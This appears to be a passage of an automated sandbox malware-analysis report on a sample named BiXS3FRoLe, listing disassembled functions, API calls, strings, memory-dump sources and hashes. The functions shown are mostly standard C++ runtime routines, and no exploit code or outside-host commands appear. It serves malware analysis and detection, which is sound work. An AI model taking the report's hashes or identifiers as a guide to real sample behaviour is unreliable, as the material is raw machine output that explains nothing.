                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8H_prolog3HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                        • String ID: eventObject
                                                                                                        • API String ID: 3870774015-1680012138
                                                                                                        • Opcode ID: baa875eeed0c72bcd748cb66238be0836b2df0020c4caacafa4ec2eead97a326
                                                                                                        • Instruction ID: c4ae535a1fae88588ec99a03fce6a5c5b435ea5fe4e232cff2f409422566ea89
                                                                                                        • Opcode Fuzzy Hash: baa875eeed0c72bcd748cb66238be0836b2df0020c4caacafa4ec2eead97a326
                                                                                                        • Instruction Fuzzy Hash: 4311A031A00305EBCB14EBA4DC4AFEE7BECAF04752F6041D4B505A61E2DF749A44C6A5
                                                                                                        Function 00B14AA2 Relevance: 15.1, APIs: 10, Instructions: 69threadCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B14AB8
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,00B0896E,?,?,?,?,00000000,?,00000000), ref: 00B14ACA
                                                                                                        • GetCurrentThread.KERNEL32 ref: 00B14AD2
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,00B0896E,?,?,?,?,00000000,?,00000000), ref: 00B14ADA
                                                                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000,00B08A12,00000000,00000000,00000002,?,?,?,?,?,00B0896E,?,?,?), ref: 00B14AF3
                                                                                                        • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00B14B14
                                                                                                          • Part of subcall function 00B02DA4: ___crtCreateThreadpoolTimer.LIBCPMT ref: 00B02DB0
                                                                                                          • Part of subcall function 00B02DA4: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00B02DBE
                                                                                                          • Part of subcall function 00B02DA4: ___crtSetThreadpoolWait.LIBCPMT ref: 00B02DD0
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00B0896E,?,?,?,?,00000000,?,00000000), ref: 00B14B26
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00B0896E,?,?,?,?,00000000,?,00000000), ref: 00B14B51
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B14B67
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B14B75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThreadThreadpoolWait___crt$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateDuplicateException@8HandleReferenceRegisterThrowTimer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1073306966-0
                                                                                                        • Opcode ID: 5d17884c7a51d4d5e53aa07fe3cb35521eec08829d8fff9afe7e2a943a59a36a
                                                                                                        • Instruction ID: 4dc21e4c1a91f12fc5cecb923fb24f51660ffc4ad9eb76461abe31e879040f0e
                                                                                                        • Opcode Fuzzy Hash: 5d17884c7a51d4d5e53aa07fe3cb35521eec08829d8fff9afe7e2a943a59a36a
                                                                                                        • Instruction Fuzzy Hash: 6611AE71648300ABD710AB749C8AFDB7AE89F05741F4804F4FA45EB2A2EB70C9448BA5
                                                                                                        Function 00B34286 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00B3429A
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        • _free.LIBCMT ref: 00B342A6
                                                                                                        • _free.LIBCMT ref: 00B342B1
                                                                                                        • _free.LIBCMT ref: 00B342BC
                                                                                                        • _free.LIBCMT ref: 00B342C7
                                                                                                        • _free.LIBCMT ref: 00B342D2
                                                                                                        • _free.LIBCMT ref: 00B342DD
                                                                                                        • _free.LIBCMT ref: 00B342E8
                                                                                                        • _free.LIBCMT ref: 00B342F3
                                                                                                        • _free.LIBCMT ref: 00B34301
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: ab1fe9de1a942be2ed3440510aa65529fcdba961c2d5651d42da1b60664064e5
                                                                                                        • Instruction ID: 1a9118a485f4dab721adeb9067dc1b7063a04604505a78c383a6185a723496d1
                                                                                                        • Opcode Fuzzy Hash: ab1fe9de1a942be2ed3440510aa65529fcdba961c2d5651d42da1b60664064e5
                                                                                                        • Instruction Fuzzy Hash: D4117276510108BFCB11EF94C982DD93BA5EF45750FA141E6BA088F232EB35EF509B80
                                                                                                        Function 00AF5594 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 302COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF55D2
                                                                                                          • Part of subcall function 00AAC470: std::_Lockit::_Lockit.LIBCPMT ref: 00AAC4BC
                                                                                                          • Part of subcall function 00AAC470: std::_Lockit::_Lockit.LIBCPMT ref: 00AAC4DE
                                                                                                          • Part of subcall function 00AAC470: std::_Lockit::~_Lockit.LIBCPMT ref: 00AAC4FE
                                                                                                          • Part of subcall function 00AAC470: std::_Lockit::~_Lockit.LIBCPMT ref: 00AAC5FC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                        • API String ID: 1383202999-2891247106
                                                                                                        • Opcode ID: 4591b9aec752c66bf9bc8342499b6e4d14530fb2366dd508b365faba091d01a6
                                                                                                        • Instruction ID: ca5488f7b3d4e00fc3d7af38141a0a281228c18b76b9af50d9daafa3cc01ad18
                                                                                                        • Opcode Fuzzy Hash: 4591b9aec752c66bf9bc8342499b6e4d14530fb2366dd508b365faba091d01a6
                                                                                                        • Instruction Fuzzy Hash: 31B1A97590020EAFDF05CFA4CC92EFE7BB9EF08344F104449FB55A62A2DA319A51DB60
                                                                                                        Function 00AF5226 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF522D
                                                                                                          • Part of subcall function 00AEB22F: __EH_prolog3.LIBCMT ref: 00AEB236
                                                                                                          • Part of subcall function 00AEB22F: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB240
                                                                                                          • Part of subcall function 00AEB22F: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB2B1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                        • API String ID: 1538362411-2891247106
                                                                                                        • Opcode ID: 60da6e1fa7d3f88a479489b11390f3ba705da5b7a67a54a0398a032daf5bdd7b
                                                                                                        • Instruction ID: 642af802758958e2522a30d5f7dbd7738b614d8d6753615fffa9591fd069cd6c
                                                                                                        • Opcode Fuzzy Hash: 60da6e1fa7d3f88a479489b11390f3ba705da5b7a67a54a0398a032daf5bdd7b
                                                                                                        • Instruction Fuzzy Hash: 7EA115B190060EAFDF05DFA4CD52EFE7BBAEF08304F10455AFB56A6291D6319A109B60
                                                                                                        Function 00AFA891 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AFA898
                                                                                                          • Part of subcall function 00AA8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 00AA8E09
                                                                                                          • Part of subcall function 00AA8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 00AA8E2B
                                                                                                          • Part of subcall function 00AA8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA8E4B
                                                                                                          • Part of subcall function 00AA8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA8F18
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                        • API String ID: 1383202999-2891247106
                                                                                                        • Opcode ID: 6aa7a2e94a6991a75cf54f1e2b74d0f8186cf4cdba145a66ba1a47ec6036c74e
                                                                                                        • Instruction ID: 03581f5cb20bbddcef14f3d6485e4bfdd089ba44e4625e810f19e3dffe87b473
                                                                                                        • Opcode Fuzzy Hash: 6aa7a2e94a6991a75cf54f1e2b74d0f8186cf4cdba145a66ba1a47ec6036c74e
                                                                                                        • Instruction Fuzzy Hash: 2FA18AB150020EEFDF05DF94CD82EFE7BBAEF18304F10445AFA4AA6291D6718950DB62
                                                                                                        Function 00AE4D70 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 131COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00AE4DAA
                                                                                                        • GetLastError.KERNEL32(0000000A), ref: 00AE4DD5
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AE4E16
                                                                                                        Strings
                                                                                                        • Timer: QueryPerformanceCounter failed with error , xrefs: 00AE4DF0
                                                                                                        • Timer: QueryPerformanceFrequency failed with error , xrefs: 00AE4EDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CounterErrorException@8LastPerformanceQueryThrow
                                                                                                        • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                                                                                                        • API String ID: 651023626-2136607233
                                                                                                        • Opcode ID: e2ecfd8528aadefe6303835bb1e99057c501e56c3a3249067049a3e5bdc3c5cc
                                                                                                        • Instruction ID: 20bc7daf46137a0f1f107989c9a42e2a2f7a9ca37597dc75d1649bfb6df687ec
                                                                                                        • Opcode Fuzzy Hash: e2ecfd8528aadefe6303835bb1e99057c501e56c3a3249067049a3e5bdc3c5cc
                                                                                                        • Instruction Fuzzy Hash: F5415B71A04348EBDB10EFA4DD45B9EB7F8FB09B00F1042AAF815A7291DF74A904CB95
                                                                                                        Function 00B1D71D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1D76B
                                                                                                        • operator+.LIBVCRUNTIME ref: 00B1D776
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1D783
                                                                                                          • Part of subcall function 00B1B317: __aulldvrm.LIBCMT ref: 00B1B348
                                                                                                          • Part of subcall function 00B1B317: DName::doPchar.LIBVCRUNTIME ref: 00B1B365
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1D7F9
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1D806
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1D829
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: NameName::$Name::doPchar__aulldvrmoperator+
                                                                                                        • String ID: `non-type-template-parameter$generic-type-
                                                                                                        • API String ID: 421312391-1834441707
                                                                                                        • Opcode ID: fbb79a9383e7e2ff74b77f1c926678a5d8a0761d81cd98927d2687c25869b106
                                                                                                        • Instruction ID: b0140ac567851fca862b027605f9952b61bb81dae97af3c2616a4f2485c1dc08
                                                                                                        • Opcode Fuzzy Hash: fbb79a9383e7e2ff74b77f1c926678a5d8a0761d81cd98927d2687c25869b106
                                                                                                        • Instruction Fuzzy Hash: 34310FB29055049ED719DB6CD891BFA7BF6EB02310FE840D9E8459B2D2DB308DC6C7A0
                                                                                                        Function 00B15D27 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00B15D40
                                                                                                          • Part of subcall function 00B1600F: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00B15A73), ref: 00B1601F
                                                                                                        • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00B15D55
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B15D64
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B15D72
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B15E28
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B15E36
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Exception@8Throwstd::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                                                                                                        • String ID: pContext$switchState
                                                                                                        • API String ID: 2757187270-2660820399
                                                                                                        • Opcode ID: 4e89a16d8af70710d50cadcd8e4b3d03454e5fccdf3dfb54321c0195a6c6f0c6
                                                                                                        • Instruction ID: 11e1ec9a74346521e85d5ecb924241d6a29fb52560ee50631606ef941dbba041
                                                                                                        • Opcode Fuzzy Hash: 4e89a16d8af70710d50cadcd8e4b3d03454e5fccdf3dfb54321c0195a6c6f0c6
                                                                                                        • Instruction Fuzzy Hash: CA31A132A00604DBCF15EF64D885EAD73F9EB84310BA044E9E9119B251DF70EE41CB90
                                                                                                        Function 00B1C635 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 00B1C655
                                                                                                          • Part of subcall function 00B1C53F: Replicator::operator[].LIBVCRUNTIME ref: 00B1C5AB
                                                                                                          • Part of subcall function 00B1C53F: DName::operator+=.LIBVCRUNTIME ref: 00B1C5B3
                                                                                                        • DName::operator+.LIBCMT ref: 00B1C6AC
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1C6F5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                        • API String ID: 834187326-2211150622
                                                                                                        • Opcode ID: e50bd811855512e12fb23a7c1fd4e249fe4fef6f19eae72d5ec3039ddb132793
                                                                                                        • Instruction ID: 573f44c36e0c305ced5f5b7e219fba9c09a26492519ce00c0422f3213b6933ea
                                                                                                        • Opcode Fuzzy Hash: e50bd811855512e12fb23a7c1fd4e249fe4fef6f19eae72d5ec3039ddb132793
                                                                                                        • Instruction Fuzzy Hash: 56218C702412049FDB04DF5CD5A1BAA3FF6EB1A345F9051EAE845DB262CF31D985CBA0
                                                                                                        Function 00B1C8B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • UnDecorator::UScore.LIBVCRUNTIME ref: 00B1C8B8
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1C8C2
                                                                                                          • Part of subcall function 00B1B218: DName::doPchar.LIBVCRUNTIME ref: 00B1B23F
                                                                                                        • UnDecorator::getScopedName.LIBVCRUNTIME ref: 00B1C901
                                                                                                        • DName::operator+=.LIBVCRUNTIME ref: 00B1C90B
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1C91A
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1C926
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1C933
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                        • String ID: void
                                                                                                        • API String ID: 1480779885-3531332078
                                                                                                        • Opcode ID: f26043468b23768ff8e08e21af2c9b160561f5aa48559a6af8d0a538bd46f6eb
                                                                                                        • Instruction ID: ca1ab614f65894bb4d6fbff78069f273ae35d9e07fff5b1603c6e1ad977d720b
                                                                                                        • Opcode Fuzzy Hash: f26043468b23768ff8e08e21af2c9b160561f5aa48559a6af8d0a538bd46f6eb
                                                                                                        • Instruction Fuzzy Hash: E511A174440204AECB09EF64C996FEDBFF4EB11340F8040D9E442AB2E2CB709AC5CB50
                                                                                                        Function 00AFEAF0 Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetEvent.KERNEL32(00000000,AE695AF0), ref: 00AFEB69
                                                                                                        • SetEvent.KERNEL32(00000000,AE695AF0), ref: 00AFEBC6
                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,00000000,AE695AF0), ref: 00AFEBDA
                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00AFEBFF
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AFEC33
                                                                                                        • SetEvent.KERNEL32(00000000), ref: 00AFEC70
                                                                                                          • Part of subcall function 00A750A0: CreateEventA.KERNEL32(?,?,?,?,AE695AF0,AE695AF0,?,00AFFCE2,?,AE695AF0,AE695AF0,?,?,?,00000000,00000000), ref: 00A750D4
                                                                                                          • Part of subcall function 00A750A0: CloseHandle.KERNEL32(00000000,?,00AFFCE2,?,AE695AF0,AE695AF0,?,?,?,00000000,00000000,AE695AF0,AE695AF0), ref: 00A750EF
                                                                                                        • SetEvent.KERNEL32(00000000,?,AE695AF0), ref: 00AFECF8
                                                                                                        • CloseHandle.KERNEL32(?,AE695AF0), ref: 00AFED26
                                                                                                        • CloseHandle.KERNEL32(?,AE695AF0), ref: 00AFEE03
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
